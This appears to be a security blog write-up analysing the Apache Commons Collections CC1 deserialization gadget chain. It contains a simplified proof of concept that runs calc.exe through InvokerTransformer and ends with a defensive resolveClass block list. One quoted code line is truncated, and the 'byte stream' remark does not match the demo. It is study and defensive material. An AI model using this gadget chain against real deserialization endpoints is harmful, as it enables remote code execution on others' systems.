CC1 chain (JDK 6)
Simplified CC1 (reproduction)
Analysing p牛's simplified CC1:
```java
package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                // Always returns the Runtime instance, whatever its input is
                new ConstantTransformer(Runtime.getRuntime()),
                // Reflectively calls exec(String) on whatever the previous transformer returned
                new InvokerTransformer("exec", new Class[]{String.class},
                        new Object[]{"C:\\Windows\\System32\\calc.exe"}),
        };
        // Runs the transformers in order, feeding each result into the next
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        // Decorate the map: every value put into outerMap passes through transformerChain
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        // put() invokes the value transformer, which fires the whole chain
        outerMap.put("test", "xxxx");
    }
}
```
Set a breakpoint and debug:
Stepping in with F7 all the way leads to the vulnerable point; the `exec` call confirms where the vulnerability lies.
At this point the data is a byte stream, so tracing back from here shows the call chain:
TransformedMap.decorate is used to attach keyTransformer and valueTransformer to innerMap:
```java
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
```
keyTransformer and valueTransformer implement the Transformer interface and are used to process newly added elements.
Back in main, transformers is defined:
```java
new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer("exec", new Class[]{String.class}, new Obj
```
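The chain above only fires if the application actually deserializes the Commons Collections classes it is built from. As an added example (not from p牛's post or ysoserial), the subclass below is the classic JDK 6/7 mitigation, where java.io.ObjectInputFilter does not exist: override resolveClass() and refuse the gadget classes before they are loaded. The class name FilteringObjectInputStream and the block list are my own choices; the listed class names are the ones used in the chain analysed above.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Hypothetical hardened stream: rejects the CC1 gadget classes during resolveClass(),
// i.e. before any of their readObject() logic or transformers can run.
public class FilteringObjectInputStream extends ObjectInputStream {

    // Block list taken from the gadget chain above; a whitelist of the
    // application's own types is stronger where the set of expected classes is known.
    private static final Set<String> BLOCKED = new HashSet<String>(Arrays.asList(
            "org.apache.commons.collections.functors.InvokerTransformer",
            "org.apache.commons.collections.functors.ChainedTransformer",
            "org.apache.commons.collections.functors.ConstantTransformer",
            "org.apache.commons.collections.map.TransformedMap"));

    public FilteringObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (BLOCKED.contains(name)) {
            // Fail closed: abort the whole stream instead of instantiating the gadget
            throw new InvalidClassException(name, "class blocked by deserialization filter");
        }
        return super.resolveClass(desc);
    }
}
```

Use it in place of a plain ObjectInputStream wherever untrusted bytes are deserialized; the InvalidClassException surfaces as the rejection you can log and alert on.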